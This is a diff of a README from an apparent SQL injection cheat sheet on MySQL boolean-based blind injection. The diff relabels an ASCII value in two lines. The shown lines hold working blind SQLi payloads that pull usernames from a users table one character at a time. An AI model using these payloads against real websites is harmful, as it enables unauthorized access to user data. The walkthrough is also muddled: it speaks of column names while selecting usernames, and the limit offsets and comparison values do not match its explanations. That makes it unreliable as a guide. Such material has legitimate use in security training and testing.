kleiton0x00/Advanced-SQL-Injection-Cheatsheet/MySQL - Boolean Based Blind SQLi/README.md

 ``' AND (ascii(substr((select username from users limit 1,1) ,1,1))) > 96 --+``
 Website doesn't load properly, second char is **a**.

-Given below query will test if the third character of the first column name is ascii 115 (p):
+Given below query will test if the third character of the first column name is ascii 115 (s):
 ``' AND (ascii(substr((select username from users limit 2,1) ,1,1))) > 114 --+``
 Website doesn't load properly, third char is **s**.

-Given below query will test if the fourth character of the first column name is ascii 115 (p):
+Given below query will test if the fourth character of the first column name is ascii 115 (s):
 ``' AND (ascii(substr((select username from users limit 3,1) ,1,1))) > 114 --+``
 Website doesn't load properly, fourth char is **s**.